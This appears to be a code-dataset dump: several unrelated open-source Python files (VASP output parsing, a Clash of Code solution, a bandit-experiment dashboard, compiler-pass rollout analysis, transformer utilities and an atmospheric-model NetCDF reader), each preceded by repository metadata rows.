def maximum_stress(self):
"""Fetch the maximum stress of at the last ionic run."""
stress = self.final_stress
if stress is None:
return None
norm = np.linalg.norm(stress, axis=1)
return np.amax(np.abs(norm))
@property
def trajectory(self):
"""
Fetch unitcells, positions, species, forces and stress.
For all calculation steps.
"""
unitcell = self._content_parser.get_unitcell('all')
positions = self._content_parser.get_positions('all')
species = self._content_parser.get_species()
forces = self._content_parser.get_forces('all')
stress = self._content_parser.get_stress('all')
# make sure all are sorted, first to last calculation
# (species is constant)
unitcell = sorted(unitcell.items())
positions = sorted(positions.items())
forces = sorted(forces.items())
stress = sorted(stress.items())
# convert to numpy
unitcell = np.asarray([item[1] for item in unitcell])
positions = np.asarray([item[1] for item in positions])
forces = np.asarray([item[1] for item in forces])
stress = np.asarray([item[1] for item in stress])
# Aiida wants the species as symbols, so invert
elements = _invert_dict(parsevaspct.elements)
symbols = np.asarray([elements[item].title() for item in species.tolist()])
if (unitcell is not None) and (positions is not None) and \
(species is not None) and (forces is not None) and \
(stress is not None):
trajectory_data = {}
keys = ('cells', 'positions', 'symbols', 'forces', 'stress', 'steps')
stepids = np.arange(unitcell.shape[0])
for key, data in zip(keys, (unitcell, positions, symbols, forces, stress, stepids)):
trajectory_data[key] = data
return trajectory_data
return None
@property
def total_energies(self):
"""Fetch the total energies after the last ionic run."""
energies = self.energies
if energies is None:
return None
energies_dict = {}
for etype in self._settings.get('energy_type', self.DEFAULT_SETTINGS['energy_type']):
energies_dict[etype] = energies[etype][-1]
# Also return the raw electronic steps energy
energies_dict[etype + '_electronic'] = energies[etype + '_electronic'][-1]
return energies_dict
@property
def energies(self):
"""Fetch the total energies."""
# Check if we want total energy entries for each electronic step.
electronic_step_energies = self._settings.get('electronic_step_energies', self.DEFAULT_SETTINGS['electronic_step_energies'])
return self._energies(nosc=not electronic_step_energies)
def _energies(self, nosc):
"""
Fetch the total energies for all energy types, calculations (ionic steps) and electronic steps.
The returned dict from the parser contains the total energy types as a key (plus the _final, which is
the final total energy ejected by VASP after the closure of the electronic steps). The energies can then
be found in the flattened ndarray where the key `electronic_steps` indicate how many electronic steps
there is per ionic step. Using the combination, one can rebuild the electronic step energy per ionic step etc.
Because the VASPrun parser returns both the electronic step energies (at the end of each cycles) and the ionic step
energies (_final), we apply a mapping to recovery the naming such that the ionic step energies do not have the suffix,
but the electronic step energies do.
"""
etype = self._settings.get('energy_type', self.DEFAULT_SETTINGS['energy_type'])
# Create a copy
etype = list(etype)
etype_orig = list(etype)
# Apply mapping and request the correct energies from the parsing results
# VASP 5 has a bug where the energy_no_entropy is not included in the XML output - we have to calculate it here
if self.version.startswith('5'):
# For energy_no_entropy needs to be calculated here
if 'energy_no_entropy' in etype_orig:
etype.append('energy_free')
etype.append('energy_extrapolated')
# energy extrapolated is stored as energy_no_entropy for the ionic steps
if 'energy_extrapolated' in etype_orig:
etype.append('energy_no_entropy')
# Remove duplicates
etype = list(set(etype))
energies = self._content_parser.get_energies(status='all', etype=etype, nosc=nosc)
# Here we must calculate the true `energy_no_entropy`
if 'energy_no_entropy' in etype_orig:
# The energy_extrapolated_final is the entropy term itself in VASP 5
# Store the calculated energy_no_entropy under 'energy_extrapolated_final',
# which is then recovered as `energy_no_entropy` later
energies['energy_extrapolated_final'] = energies['energy_free_final'] - energies['energy_extrapolated_final']
else:
energies = self._content_parser.get_energies(status='all', etype=etype, nosc=nosc)
if energies is None:
return None
# Apply mapping - those with `_final` has the suffix removed and those without has `_electronic` added
mapped_energies = {}
mapping = self.ENERGY_MAPPING_VASP5 if self.version.startswith('5') else self.ENERGY_MAPPING
# Reverse the mapping - now key is the name of the original energies output
revmapping = {value: key for key, value in mapping.items()}
for key, value in energies.items():
# Apply mapping if needed
if key in revmapping:
if revmapping[key].replace('_electronic', '') in etype_orig:
mapped_energies[revmapping[key]] = value
else:
mapped_energies[key] = value
return mapped_energies
@property
def projectors(self):
"""Fetch the projectors."""
proj = self._content_parser.get_projectors()
if proj is None:
return None
projectors = {}
prj = []
try:
prj.append(proj['total']) # pylint: disable=unsubscriptable-object
except KeyError:
try:
prj.append(proj['up']) # pylint: disable=unsubscriptable-object
prj.append(proj['down']) # pylint: disable=unsubscriptable-object
except KeyError:
self._logger.error('Did not detect any projectors. Returning.')
if len(prj) == 1:
projectors['projectors'] = prj[0]
else:
projectors['projectors'] = np.asarray(prj)
return projectors
@property
def dielectrics(self):
"""Fetch the dielectric function."""
diel = self._content_parser.get_dielectrics()
if diel is None:
return None
dielectrics = {}
energy = diel.get('energy')
idiel = diel.get('imag')
rdiel = diel.get('real')
epsilon = diel.get('epsilon')
epsilon_ion = diel.get('epsilon_ion')
if energy is not None:
dielectrics['ediel'] = energy
if idiel is not None:
dielectrics['rdiel'] = rdiel
if rdiel is not None:
dielectrics['idiel'] = idiel
if epsilon is not None:
dielectrics['epsilon'] = epsilon
if epsilon_ion is not None:
dielectrics['epsilon_ion'] = epsilon_ion
return dielectrics
@property
def born_charges(self):
"""Fetch the Born effective charges."""
brn = self._content_parser.get_born()
if brn is None:
return None
born = {'born_charges': brn}
return born
@property
def hessian(self):
"""Fetch the Hessian matrix."""
hessian = self._content_parser.get_hessian()
if hessian is None:
return None
hess = {'hessian': hessian}
return hess
@property
def dynmat(self):
"""Fetch the dynamical eigenvectors and eigenvalues."""
dynmat = self._content_parser.get_dynmat()
if dynmat is None:
return None
dyn = {}
dyn['dynvec'] = dynmat['eigenvectors'] # pylint: disable=unsubscriptable-object
dyn['dyneig'] = dynmat['eigenvalues'] # pylint: disable=unsubscriptable-object
return dyn
@property
def dos(self):
"""Fetch the total density of states."""
dos = self._content_parser.get_dos()
if dos is None:
return None
densta = {}
# energy is always there, regardless of
# total, spin or partial
energy = dos['total']['energy'] # pylint: disable=unsubscriptable-object
densta['energy'] = energy
tdos = None
pdos = None
upspin = dos.get('up')
downspin = dos.get('down')
total = dos.get('total')
if (upspin is not None) and (downspin is not None):
tdos = np.stack((upspin['total'], downspin['total']))
if (upspin['partial'] is not None) and \
(downspin['partial'] is not None):
pdos = np.stack((upspin['partial'], downspin['partial']))
else:
tdos = total['total']
pdos = total['partial']
densta['tdos'] = tdos
if pdos is not None:
densta['pdos'] = pdos
return densta
@property
def fermi_level(self):
"""Fetch Fermi level."""
return self._content_parser.get_fermi_level()
@property
def run_status(self):
"""Fetch run_status information"""
info = {}
# First check electronic convergence by comparing executed steps to the
# maximum allowed number of steps (NELM).
energies = self._content_parser.get_energies('last', nosc=False)
parameters = self._content_parser.get_parameters()
info['finished'] = not self._content_parser.truncated
# Only set to true for untruncated run to avoid false positives
if energies is None:
info['electronic_converged'] = False
elif energies.get('electronic_steps')[0] < parameters['nelm'] and not self._content_parser.truncated:
info['electronic_converged'] = True
else:
info['electronic_converged'] = False
# Then check the ionic convergence by comparing executed steps to the
# maximum allowed number of steps (NSW).
energies = self._content_parser.get_energies('all', nosc=True)
if energies is None:
info['ionic_converged'] = False
else:
if len(energies.get('electronic_steps')) < parameters['nsw'] and not self._content_parser.truncated:
info['ionic_converged'] = True
else:
info['ionic_converged'] = False
# Override if nsw is 0 - no ionic steps are performed
if parameters['nsw'] < 1:
info['ionic_converged'] = None
return info
@property
def band_properties(self):
"""Fetch key properties of the electronic structure."""
eigenvalues = self.eigenvalues
occupancies = self.occupancies
if eigenvalues is None:
return None
# Convert dict to index in numpy array
if 'total' in eigenvalues:
eig = np.array(eigenvalues['total'])
occ = np.array(occupancies['total'])
else:
eig = np.array([eigenvalues['up'], eigenvalues['down']])
occ = np.array([occupancies['up'], occupancies['down']])
return get_band_properties(eig, occ)
def _build_structure(lattice):
"""Builds a structure according to AiiDA spec."""
structure_dict = {}
structure_dict['unitcell'] = lattice['unitcell']
structure_dict['sites'] = []
# AiiDA wants the species as symbols, so invert
elements = _invert_dict(parsevaspct.elements)
for pos, specie in zip(lattice['positions'], lattice['species']):
site = {}
site['position'] = np.dot(pos, lattice['unitcell'])
site['symbol'] = elements[specie].title()
site['kind_name'] = elements[specie].title()
structure_dict['sites'].append(site)
return structure_dict
def _invert_dict(dct):
return dct.__class__(map(reversed, dct.items()))
| 31.898571
| 132
| 0.578261
| 2,355
| 22,329
| 5.343524
| 0.167728
| 0.02535
| 0.039177
| 0.039733
| 0.207088
| 0.179832
| 0.125238
| 0.101716
| 0.089558
| 0.089558
| 0
| 0.001314
| 0.318151
| 22,329
| 699
| 133
| 31.944206
| 0.825222
| 0.22894
| 0
| 0.278761
| 0
| 0
| 0.161119
| 0.022793
| 0
| 0
| 0
| 0
| 0
| 1
| 0.068584
| false
| 0
| 0.011062
| 0.002212
| 0.19469
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
5fb3ccf7fca90c61707cbd90f3475846779b54b9
| 341
|
py
|
Python
|
clash-of-code/shortest/number_categories.py
|
jonasnic/codingame
|
f1a7fe8007b9ca63bdf30cd72f4d6ac41a5ac721
|
[
"MIT"
] | 30
|
2016-04-30T01:56:05.000Z
|
2022-03-09T22:19:12.000Z
|
clash-of-code/shortest/number_categories.py
|
jonasnic/codingame
|
f1a7fe8007b9ca63bdf30cd72f4d6ac41a5ac721
|
[
"MIT"
] | 1
|
2021-05-19T19:36:45.000Z
|
2021-05-19T19:36:45.000Z
|
clash-of-code/shortest/number_categories.py
|
jonasnic/codingame
|
f1a7fe8007b9ca63bdf30cd72f4d6ac41a5ac721
|
[
"MIT"
] | 17
|
2020-01-28T13:54:06.000Z
|
2022-03-26T09:49:27.000Z
|
from collections import defaultdict
c=defaultdict(set)
f=lambda:[int(i) for i in input().split()]
a,b=f()
s,e=f()
for i in range(s,e+1):
x=i%a==0
y=i%b==0
if x and y:
c[3].add(i)
elif x and not y:
c[1].add(i)
elif y and not x:
c[2].add(i)
else:
c[4].add(i)
o=[]
for i in range(1,5):
o.append(str(len(c[i])))
print(' '.join(o))
| 17.05
| 42
| 0.58651
| 84
| 341
| 2.380952
| 0.464286
| 0.08
| 0.09
| 0.11
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.031915
| 0.173021
| 341
| 20
| 43
| 17.05
| 0.677305
| 0
| 0
| 0
| 0
| 0
| 0.002924
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.05
| 0
| 0.05
| 0.05
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
5fb5e0196946388daa9f3a5d9e0cb39eba4f8a0c
| 520
|
py
|
Python
|
interpreter/src/parser/errors.py
|
Cdayz/simple_lang
|
dc19d6ef76bb69c87981c8b826cf8f71b0cc475b
|
[
"MIT"
] | 3
|
2019-08-22T01:20:16.000Z
|
2021-02-05T09:11:50.000Z
|
interpreter/src/parser/errors.py
|
Cdayz/simple_lang
|
dc19d6ef76bb69c87981c8b826cf8f71b0cc475b
|
[
"MIT"
] | null | null | null |
interpreter/src/parser/errors.py
|
Cdayz/simple_lang
|
dc19d6ef76bb69c87981c8b826cf8f71b0cc475b
|
[
"MIT"
] | 2
|
2019-08-22T01:20:18.000Z
|
2021-05-27T14:40:12.000Z
|
"""Module with useful exceptions for Parser."""
class BadOperationIdentifier(Exception):
"""Bad operation identifier used."""
class BadOperationArgument(Exception):
"""Bad argument provided to operation."""
class BadInPlaceValue(Exception):
"""Bad in-place value provided as argument."""
class ParsingError(Exception):
"""Parsing error."""
def __init__(self, line_index, line, exception):
self.line_index = line_index
self.line_code = line
self.exception = exception
| 22.608696
| 52
| 0.696154
| 55
| 520
| 6.436364
| 0.563636
| 0.101695
| 0.073446
| 0.096045
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.188462
| 520
| 22
| 53
| 23.636364
| 0.838863
| 0.315385
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.125
| false
| 0
| 0
| 0
| 0.625
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
5fb78ad70383d16f179dd4a23ab825be06e844e6
| 1,919
|
py
|
Python
|
apps/DuelingBanditsPureExploration/dashboard/Dashboard.py
|
erinzm/NEXT-chemistry
|
d6ca0a80640937b36f9cafb5ead371e7a8677734
|
[
"Apache-2.0"
] | 155
|
2015-11-01T17:48:41.000Z
|
2022-02-06T21:37:41.000Z
|
apps/DuelingBanditsPureExploration/dashboard/Dashboard.py
|
erinzm/NEXT-chemistry
|
d6ca0a80640937b36f9cafb5ead371e7a8677734
|
[
"Apache-2.0"
] | 193
|
2015-09-29T21:40:31.000Z
|
2020-04-21T15:09:13.000Z
|
apps/DuelingBanditsPureExploration/dashboard/Dashboard.py
|
erinzm/NEXT-chemistry
|
d6ca0a80640937b36f9cafb5ead371e7a8677734
|
[
"Apache-2.0"
] | 54
|
2015-09-30T15:51:05.000Z
|
2022-02-13T05:26:20.000Z
|
import json
import next.utils as utils
from next.apps.AppDashboard import AppDashboard
class MyAppDashboard(AppDashboard):
def __init__(self,db,ell):
AppDashboard.__init__(self,db,ell)
def most_current_ranking(self,app, butler, alg_label):
"""
Description: Returns a ranking of arms in the form of a list of dictionaries, which is conveneint for downstream applications
Expected input:
(string) alg_label : must be a valid alg_label contained in alg_list list of dicts
The 'headers' contains a list of dictionaries corresponding to each column of the table with fields 'label' and 'field'
where 'label' is the label of the column to be put on top of the table, and 'field' is the name of the field in 'data' that the column correpsonds to
Expected output (in dict):
plot_type : 'columnar_table'
headers : [ {'label':'Rank','field':'rank'}, {'label':'Target','field':'index'} ]
(list of dicts with fields) data (each dict is a row, each field is the column for that row):
(int) index : index of target
(int) ranking : rank (0 to number of targets - 1) representing belief of being best arm
"""
item = app.getModel(json.dumps({'exp_uid':app.exp_uid, 'args': {'alg_label':alg_label}}))
return_dict = {}
return_dict['headers'] = [{'label':'Rank','field':'rank'},
{'label':'Target','field':'index'},
{'label':'Score','field':'score'},
{'label':'Precision','field':'precision'}]
for target in item['targets']:
for key in ['score', 'precision']:
target[key] = '{:0.5f}'.format(target[key])
return_dict['data'] = item['targets']
return_dict['plot_type'] = 'columnar_table'
return return_dict
| 47.975
| 158
| 0.604482
| 246
| 1,919
| 4.605691
| 0.390244
| 0.035305
| 0.017652
| 0.022948
| 0.125331
| 0.0812
| 0.0812
| 0.0812
| 0.0812
| 0
| 0
| 0.002882
| 0.276707
| 1,919
| 39
| 159
| 49.205128
| 0.813401
| 0.45284
| 0
| 0
| 0
| 0
| 0.186441
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.105263
| false
| 0
| 0.157895
| 0
| 0.368421
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
5fc3fd1b7cba71af7933022261d214435bda9000
| 2,786
|
py
|
Python
|
results/baseline/parse_rollout.py
|
XiaoSanchez/autophase
|
3d8d173ad27b9786e36efd22d0ceacbcf1cb1dfb
|
[
"BSD-3-Clause"
] | 14
|
2020-04-03T12:41:50.000Z
|
2022-02-04T00:05:01.000Z
|
results/baseline/parse_rollout.py
|
XiaoSanchez/autophase
|
3d8d173ad27b9786e36efd22d0ceacbcf1cb1dfb
|
[
"BSD-3-Clause"
] | 2
|
2020-03-02T04:32:58.000Z
|
2021-09-15T20:02:25.000Z
|
results/baseline/parse_rollout.py
|
XiaoSanchez/autophase
|
3d8d173ad27b9786e36efd22d0ceacbcf1cb1dfb
|
[
"BSD-3-Clause"
] | 8
|
2020-03-02T10:30:36.000Z
|
2021-08-03T02:29:38.000Z
|
import pickle
import sys
import numpy as np
def geomean(iterable):
a = np.array(iterable).astype(float)
prod = a.prod()
prod = -prod if prod < 0 else prod
return prod**(1.0/len(a))
# Define the valid programs here
def is_valid_pgm(pgm):
pgms = ['471', '4926', '12092', '3449', '4567', '16510', '6118', '15427', '112', '15801', '3229', '12471', '3271', '16599', '11090', '16470', '10308', '9724', '8971', '15292', '15117', '6827', '9381', '18028', '4278', '16971', '1985', '12721', '16698', '7246', '1335', '7923', '13570', '11580', '16010', '10492', '10396', '13085', '17532', '14602', '16879', '8518', '1546', '12204', '15008', '5381']
for ref_pgm in pgms:
if pgm == ref_pgm:
return True
return False
def parse_rollout(baseline_fn="baseline.txt", rollout_fn="ppo_results_orig_norm_24pass_random_log.csv"):
pgms = []
results = {}
total_count = 0
total_rl_cycle = []
with open(rollout_fn) as f:
lines = f.readlines()
for line in lines:
data = line.split(',')
pgm = data[0] + '.c'
cycle = int(data[1].replace('\n',''))
#if cycle < 20000 and cycle > 1000:
#if cycle < 10000000 and is_valid_pgm(data[0]):
if cycle < 10000000:
cycles = [cycle]
results[pgm] = cycles
total_count += 1
total_rl_cycle.append(cycle)
pgms.append(data[0])
better_count = 0
equal_count = 0
total_o3_cycle = []
with open(baseline_fn) as f:
lines = f.readlines()
lines = lines[1:]
for line in lines:
data = line.split('|')
if data[0] in results.keys():
cycle = int(data[2])
results[data[0]].append(cycle)
total_o3_cycle.append(cycle)
#if cycle == 10000000:
# print(data[0])
# raise
if cycle > results[data[0]][0]:
better_count += 1
if cycle == results[data[0]][0]:
equal_count += 1
print(results)
print("total_count: {}".format(total_count))
print("better_count: {}".format(better_count))
print("equal_count: {}".format(equal_count))
print("worse_count: {}".format(total_count - better_count - equal_count))
avg_o3_cycle = np.average(total_o3_cycle)
avg_rl_cycle = np.average(total_rl_cycle)
geomean_o3_cycle = geomean(total_o3_cycle)
geomean_rl_cycle = geomean(total_rl_cycle)
print("average o3 cycles: {}".format(avg_o3_cycle))
print("average rl cycles: {}".format(avg_rl_cycle))
print("ratio: {}".format(avg_o3_cycle/avg_rl_cycle))
print("geomean o3 cycles: {}".format(geomean_o3_cycle))
print("geomean rl cycles: {}".format(geomean_rl_cycle))
print("ratio: {}".format(geomean_o3_cycle/geomean_rl_cycle))
#print(pgms)
if __name__ == '__main__':
rollout_fn = sys.argv[1]
parse_rollout(rollout_fn=rollout_fn)
| 34.395062
| 401
| 0.623116
| 388
| 2,786
| 4.255155
| 0.332474
| 0.042399
| 0.036342
| 0.012114
| 0.155058
| 0.081163
| 0.032707
| 0
| 0
| 0
| 0
| 0.125963
| 0.207825
| 2,786
| 80
| 402
| 34.825
| 0.622111
| 0.059584
| 0
| 0.061538
| 0
| 0
| 0.168453
| 0.016462
| 0
| 0
| 0
| 0
| 0
| 1
| 0.046154
| false
| 0.015385
| 0.046154
| 0
| 0.138462
| 0.169231
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
5fc5f8dbe2e450d186ac311e88fde09d3e71e36d
| 767
|
py
|
Python
|
src/transformer_utils/util/module_utils.py
|
cfoster0/transformer-utils
|
4e4bc61adb331f90bb2a9a394db07e25eda87555
|
[
"MIT"
] | 10
|
2021-07-11T07:32:35.000Z
|
2022-02-16T16:46:19.000Z
|
src/transformer_utils/util/module_utils.py
|
cfoster0/transformer-utils
|
4e4bc61adb331f90bb2a9a394db07e25eda87555
|
[
"MIT"
] | null | null | null |
src/transformer_utils/util/module_utils.py
|
cfoster0/transformer-utils
|
4e4bc61adb331f90bb2a9a394db07e25eda87555
|
[
"MIT"
] | 2
|
2021-05-24T22:50:28.000Z
|
2021-09-14T16:14:10.000Z
|
from .python_utils import make_print_if_verbose
def get_child_module_by_names(module, names):
obj = module
for getter in map(lambda name: lambda obj: getattr(obj, name), names):
obj = getter(obj)
return obj
def get_leaf_modules(module, verbose=False):
vprint = make_print_if_verbose(verbose)
names = []
leaves = []
handled = set()
for param_name in dict(module.named_parameters()).keys():
mod_name = param_name.rpartition(".")[0]
mod = get_child_module_by_names(module, mod_name.split("."))
if mod_name in handled:
continue
vprint((param_name, mod_name, mod))
names.append(mod_name)
leaves.append(mod)
handled.add(mod_name)
return names, leaves
| 23.96875
| 74
| 0.65189
| 103
| 767
| 4.592233
| 0.407767
| 0.088795
| 0.046512
| 0.07611
| 0.114165
| 0.114165
| 0
| 0
| 0
| 0
| 0
| 0.001724
| 0.243807
| 767
| 31
| 75
| 24.741935
| 0.813793
| 0
| 0
| 0
| 0
| 0
| 0.002608
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.095238
| false
| 0
| 0.047619
| 0
| 0.238095
| 0.142857
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
5fc75bc9dcba17efcc6fbd5b1c74a679be2c870d
| 32,615
|
py
|
Python
|
monetio/models/_rrfs_cmaq_mm.py
|
zmoon/monetio
|
c8326750fa5d2404ccec726a5088f9a0e7fd4c4a
|
[
"MIT"
] | 1
|
2022-02-18T22:49:23.000Z
|
2022-02-18T22:49:23.000Z
|
monetio/models/_rrfs_cmaq_mm.py
|
zmoon/monetio
|
c8326750fa5d2404ccec726a5088f9a0e7fd4c4a
|
[
"MIT"
] | null | null | null |
monetio/models/_rrfs_cmaq_mm.py
|
zmoon/monetio
|
c8326750fa5d2404ccec726a5088f9a0e7fd4c4a
|
[
"MIT"
] | 1
|
2022-02-04T19:09:32.000Z
|
2022-02-04T19:09:32.000Z
|
""" RRFS-CMAQ File Reader """
import numpy as np
import xarray as xr
from numpy import concatenate
from pandas import Series
def can_do(index):
if index.max():
return True
else:
return False
def open_mfdataset(
fname,
convert_to_ppb=True,
mech="cb6r3_ae6_aq",
var_list=None,
fname_pm25=None,
surf_only=False,
**kwargs
):
# Like WRF-chem add var list that just determines whether to calculate sums or not to speed this up.
"""Method to open RFFS-CMAQ dyn* netcdf files.
Parameters
----------
fname : string or list
fname is the path to the file or files. It will accept hot keys in
strings as well.
convert_to_ppb : boolean
If true the units of the gas species will be converted to ppbv
mech: str
Mechanism to be used for calculating sums. Mechanisms supported:
"cb6r3_ae6_aq"
var_list: list
List of variables to include in output. MELODIES-MONET only reads in
variables need to plot in order to save on memory and simulation cost
especially for vertical data. If None, will read in all model data and
calculate all sums.
fname_pm25: string or list
Optional path to the file or files for precalculated PM2.5 sums. It
will accept hot keys in strings as well.
surf_only: boolean
Whether to save only surface data to save on memory and computational
cost (True) or not (False).
Returns
-------
xarray.DataSet
RRFS-CMAQ model dataset in standard format for use in MELODIES-MONET
"""
# Get dictionary of summed species for the mechanism of choice.
dict_sum = dict_species_sums(mech=mech)
if var_list is not None:
# Read in only a subset of variables and only do calculations if needed.
var_list_orig = var_list.copy() # Keep track of the original list before changes.
list_calc_sum = []
list_remove_extra = [] # list of variables to remove after the sum to save in memory.
for var_sum in [
"PM25",
"PM10",
"noy_gas",
"noy_aer",
"nox",
"pm25_cl",
"pm25_ec",
"pm25_ca",
"pm25_na",
"pm25_nh4",
"pm25_no3",
"pm25_so4",
"pm25_om",
]:
if var_sum in var_list:
if var_sum == "PM25":
var_list.extend(dict_sum["aitken"])
var_list.extend(dict_sum["accumulation"])
var_list.extend(dict_sum["coarse"])
# Keep track to remove these later too
list_remove_extra.extend(dict_sum["aitken"])
list_remove_extra.extend(dict_sum["accumulation"])
list_remove_extra.extend(dict_sum["coarse"])
elif var_sum == "PM10":
var_list.extend(dict_sum["aitken"])
var_list.extend(dict_sum["accumulation"])
var_list.extend(dict_sum["coarse"])
# Keep track to remove these later too
list_remove_extra.extend(dict_sum["aitken"])
list_remove_extra.extend(dict_sum["accumulation"])
list_remove_extra.extend(dict_sum["coarse"])
else:
var_list.extend(dict_sum[var_sum])
# Keep track to remove these later too
list_remove_extra.extend(dict_sum[var_sum])
var_list.remove(var_sum)
list_calc_sum.append(var_sum)
# append the other needed species.
var_list.append("lat")
var_list.append("lon")
var_list.append("phalf")
var_list.append("tmp")
var_list.append("pressfc")
var_list.append("dpres")
var_list.append("hgtsfc")
var_list.append("delz")
# Remove duplicates just in case:
var_list = list(dict.fromkeys(var_list))
list_remove_extra = list(dict.fromkeys(list_remove_extra))
# Select only those elements in list_remove_extra that are not in var_list_orig
list_remove_extra_only = list(set(list_remove_extra) - set(var_list_orig))
# If variables in pm25 files are included remove these as these are not in the main file
# And will be added later.
for pm25_var in [
"PM25_TOT",
"PM25_TOT_NSOM",
"PM25_EC",
"PM25_NH4",
"PM25_NO3",
"PM25_SO4",
"PM25_OC",
"PM25_OM",
]:
if pm25_var in var_list:
var_list.remove(pm25_var)
# open the dataset using xarray
dset = xr.open_mfdataset(fname, concat_dim="time", combine="nested", **kwargs)[var_list]
else:
# Read in all variables and do all calculations.
dset = xr.open_mfdataset(fname, concat_dim="time", combine="nested", **kwargs)
list_calc_sum = [
"PM25",
"PM10",
"noy_gas",
"noy_aer",
"nox",
"pm25_cl",
"pm25_ec",
"pm25_ca",
"pm25_na",
"pm25_nh4",
"pm25_no3",
"pm25_so4",
"pm25_om",
]
if fname_pm25 is not None:
# Add the processed pm2.5 species.
dset_pm25 = xr.open_mfdataset(fname_pm25, concat_dim="time", combine="nested", **kwargs)
dset_pm25 = dset_pm25.drop(
labels=["lat", "lon", "pfull"]
) # Drop duplicate variables so can merge.
# Slight differences in pfull value between the files, but I assume that these still represent the
# same pressure levels from the model dynf* files.
# Attributes are formatted differently in pm25 file so remove attributes and use those from dynf* files.
dset_pm25.attrs = {}
dset = dset.merge(dset_pm25)
# Standardize some variable names
dset = dset.rename(
{
"grid_yt": "y",
"grid_xt": "x",
"pfull": "z",
"phalf": "z_i", # Interface pressure levels
"lon": "longitude",
"lat": "latitude",
"tmp": "temperature_k", # standard temperature (kelvin)
"pressfc": "surfpres_pa",
"dpres": "dp_pa", # Change names so standard surfpres_pa and dp_pa
"hgtsfc": "surfalt_m",
"delz": "dz_m",
}
) # Optional, but when available include altitude info
# Calculate pressure. This has to go before sorting because ak and bk
# are not sorted as they are in attributes
dset["pres_pa_mid"] = _calc_pressure(dset)
# Adjust pressure levels for all models such that the surface is first.
dset = dset.sortby("z", ascending=False)
dset = dset.sortby("z_i", ascending=False)
# Note this altitude calcs needs to always go after resorting.
# Altitude calculations are all optional, but for each model add values that are easy to calculate.
dset["alt_msl_m_full"] = _calc_hgt(dset)
dset["dz_m"] = dset["dz_m"] * -1.0 # Change to positive values.
# Set coordinates
dset = dset.reset_index(
["x", "y", "z", "z_i"], drop=True
) # For now drop z_i no variables use it.
dset["latitude"] = dset["latitude"].isel(time=0)
dset["longitude"] = dset["longitude"].isel(time=0)
dset = dset.reset_coords()
dset = dset.set_coords(["latitude", "longitude"])
# These sums and units are quite expensive and memory intensive,
# so add option to shrink dataset to just surface when needed
if surf_only:
dset = dset.isel(z=0).expand_dims("z", axis=1)
# Need to adjust units before summing for aerosols
# convert all gas species to ppbv
if convert_to_ppb:
for i in dset.variables:
if "units" in dset[i].attrs:
if "ppmv" in dset[i].attrs["units"]:
dset[i] *= 1000.0
dset[i].attrs["units"] = "ppbv"
# convert "ug/kg to ug/m3"
for i in dset.variables:
if "units" in dset[i].attrs:
if "ug/kg" in dset[i].attrs["units"]:
# ug/kg -> ug/m3 using dry air density
dset[i] = dset[i] * dset["pres_pa_mid"] / dset["temperature_k"] / 287.05535
dset[i].attrs["units"] = r"$\mu g m^{-3}$"
# add lazy diagnostic variables
# Note that because there are so many species to sum. Summing the aerosols is slowing down the code.
if "PM25" in list_calc_sum:
dset = add_lazy_pm25(dset, dict_sum)
if "PM10" in list_calc_sum:
dset = add_lazy_pm10(dset, dict_sum)
if "noy_gas" in list_calc_sum:
dset = add_lazy_noy_g(dset, dict_sum)
if "noy_aer" in list_calc_sum:
dset = add_lazy_noy_a(dset, dict_sum)
if "nox" in list_calc_sum:
dset = add_lazy_nox(dset, dict_sum)
if "pm25_cl" in list_calc_sum:
dset = add_lazy_cl_pm25(dset, dict_sum)
if "pm25_ec" in list_calc_sum:
dset = add_lazy_ec_pm25(dset, dict_sum)
if "pm25_ca" in list_calc_sum:
dset = add_lazy_ca_pm25(dset, dict_sum)
if "pm25_na" in list_calc_sum:
dset = add_lazy_na_pm25(dset, dict_sum)
if "pm25_nh4" in list_calc_sum:
dset = add_lazy_nh4_pm25(dset, dict_sum)
if "pm25_no3" in list_calc_sum:
dset = add_lazy_no3_pm25(dset, dict_sum)
if "pm25_so4" in list_calc_sum:
dset = add_lazy_so4_pm25(dset, dict_sum)
if "pm25_om" in list_calc_sum:
dset = add_lazy_om_pm25(dset, dict_sum)
# Change the times to pandas format
dset["time"] = dset.indexes["time"].to_datetimeindex(unsafe=True)
# Turn off warning for now. This is just because the model is in julian time
# Drop extra variables that were part of sum, but are not in original var_list
# to save memory and computational time.
